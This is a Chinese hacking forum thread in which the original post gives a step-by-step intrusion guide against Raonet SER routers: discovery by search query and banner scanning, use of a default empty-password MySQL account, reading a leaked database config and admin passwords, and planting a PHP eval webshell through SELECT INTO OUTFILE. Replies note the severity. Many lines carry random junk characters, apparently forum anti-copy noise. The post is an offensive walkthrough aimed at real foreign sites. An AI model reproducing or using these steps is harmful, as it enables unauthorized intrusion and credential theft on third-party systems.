找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2807|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
9 X7 _0 V& B6 G/ Q$ _# J; C1 i$ M% n8 O+ r3 X
1:google搜索'Raonet Subscriber Ethernet Router'0 p8 Z# R* p: m  Z( T

; j; Q3 S0 d; Z* d; R# c2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
- |4 M6 ]/ z% U; o- w% ~5 I" Z( t, F+ b/ l5 J
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, g- O, w7 A, \  Y% c/ h9 i- s. F3 O! V/ q. M) S/ i
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
2 j6 l, G. r( b5 {: ^7 }+ Y1 Y
1 F7 b! L1 h2 I  Z + r+ ]7 ]( e, Y- T4 {9 ~

) l! Q  n( k" N入侵步骤:
& V' J! @+ L5 X0 c: ^4 u8 {/ w( v7 h7 N/ f7 B
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 _8 }2 j& p3 ]* C: }* H( P' ~0 ?9 N$ i$ _- T2 t0 u/ i% o" l3 ]
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc% p+ K6 n. m# e  D" @. p" k
3:得到密码后连接,查看GUI管理密码:+ n! J! N. G" i* m( X
use ser_500* j4 K; Z' O& @- H# g  ]
select id,passwd from user;1 r" {! h5 \3 A& e; D  O2 |+ P
4:通过数据库写入webshell,执行命令:
5 D4 v% ]* {. x' J. P' cuse mysql;; d* _) {; w/ V# J8 g, q  Q
create table ok(cmd TEXT);
& i8 K  G, O4 d- @6 {9 P& b9 C! T* V' Ginsert into ok values("<?php @eval($_POST[cmd])?>");  z  m4 e! ?5 x+ m" `  Y
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
. z  S6 ]8 R# I1 Y  V. Ndrop table ok;
/ I) [6 u7 ^4 n$ \( K
: e% Q5 g# ~. y3 B/ O7 V- C2 l5:连接后门shell.php 1 q7 [, g. c3 i, I2 N5 Y0 M

3 `6 q" Y5 H. `' i6. 搞定!
' j6 _: D2 E5 J8 a  l: ?. n; x% q0 s6 F- X, X1 ]
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表